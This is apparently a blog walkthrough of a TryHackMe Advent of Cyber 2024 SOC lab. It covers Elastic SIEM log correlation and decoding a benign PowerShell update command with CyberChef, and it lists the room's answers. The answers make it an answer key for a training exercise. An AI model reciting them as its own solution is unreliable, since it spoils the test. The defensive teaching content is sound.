THM AOC2024 Day 2: SOC SOS – Separating Fact from Fiction

Every December, TryHackMe's Advent of Cyber delivers 24 free daily cybersecurity challenges, offering hands-on scenarios that simulate real-world attacks and defenses. Designed for beginners and professionals alike, it's an exciting, gamified way to explore topics like threat hunting, penetration testing, cryptography, and more. This event is perfect for building skills, gaining practical experience, and spreading some cybersecurity cheer during the festive season!

---

Learning Objectives

1. Learn to differentiate between True Positives (TP) and False Positives (FP) in a Security Operations Center (SOC).
2. Understand how to use context and correlation to analyze suspicious activity.
3. Learn the basics of investigating encoded PowerShell commands.

---

Tools Used

• Elastic SIEM: To analyze and correlate log data from alerts.
• CyberChef: To decode encoded PowerShell commands and examine their contents.

---

Tool Spotlight: Elastic SIEM and CyberChef

Elastic SIEM acts as the analyst's central console for monitoring, correlating, and investigating security events. It provides dashboards, filtering options, and query capabilities to dig deeper into suspicious activity. It's especially powerful in scenarios involving brute-force attempts or encoded command execution, as it allows precise timeline filtering and detailed event inspection.

CyberChef, on the other hand, is the "cyber Swiss army knife." It's invaluable for tasks like decoding Base64 strings (commonly used in PowerShell scripts), extracting hidden data, and analyzing encoded malware payloads. For today's mission, CyberChef played a critical role in uncovering the purpose of PowerShell commands executed on compromised systems.

---

Room Tasks and Investigation

Step 1: Logging into Elastic SIEM

We began by accessing the Elastic SIEM console with credentials provided in the connection card. This allowed us to investigate the alerts triggered by Mayor Malware's report of encoded PowerShell commands executed across multiple machines.

Step 2: Narrowing the Time Window

The suspicious activity occurred on December 1st, 2024, between 0900 and 0930. By setting this time window in the SIEM, we identified 21 relevant events. To make the logs more readable, fields such as host.hostname, user.name, and process.command_line were added as table columns.

---

Step 3: Observing the Pattern

A clear sequence emerged:

• Authentication events showed a successful login by service_admin, followed closely by PowerShell command executions on multiple machines.
• Investigation revealed that the service_admin account was being accessed from two IP addresses: the legitimate one used for patching updates and another suspicious IP (10.0.255.1).

Step 4: Decoding the PowerShell Command

Using CyberChef, we decoded the suspicious encoded PowerShell command:

powershellCopy codeInstall-WindowsUpdate -AcceptAll -AutoReboot

This revealed that the command was actually fixing an issue caused by outdated credentials, not installing malware as initially suspected.

---

Answering the Questions

1. What is the name of the account causing all the failed login attempts?
   • Answer: service_admin
2. How many failed logon attempts were observed?
   • Answer: 6791
3. What is the IP address of Glitch?
   • Answer: 10.0.255.1
4. When did Glitch successfully log on to ADM-01?
   • Answer: Dec 1, 2024 08:54:39.000
5. What is the decoded command executed by Glitch to fix the systems of Wareville?
   • Answer: Install-WindowsUpdate -AcceptAll -AutoReboot

---

Learning Objectives Recap

True vs. False Positives in a SOC

Today's task emphasized the importance of distinguishing TPs from FPs. Misclassifying a TP as an FP can allow malicious activity to go unnoticed, while labeling an FP as a TP can waste valuable time. The structured approach of correlating past events, observing context, and validating hypotheses ensures analysts make informed decisions.

In real-world SOC operations, relying on dashboards, contextual evidence, and patterns (like brute-force login attempts) is essential. For example, organizations can develop detection rules based on the timeline patterns observed here, such as the sudden spike in login failures preceding a successful login and execution of PowerShell commands.

The Power of Context and Correlation

Correlation helped us tie together Glitch's successful login, the execution of PowerShell commands, and the cleanup of expired credentials. In practice, this skill enables analysts to create a story around events—essentially becoming digital detectives.

Investigating Encoded Commands

PowerShell is often used in cyberattacks to download malware, exfiltrate data, or execute lateral movement. CyberChef allowed us to decode the encoded command and verify its legitimacy, a common SOC practice for responding to encoded payloads in the wild. Organizations should ensure encoded commands are thoroughly investigated to avoid overlooking malicious activity.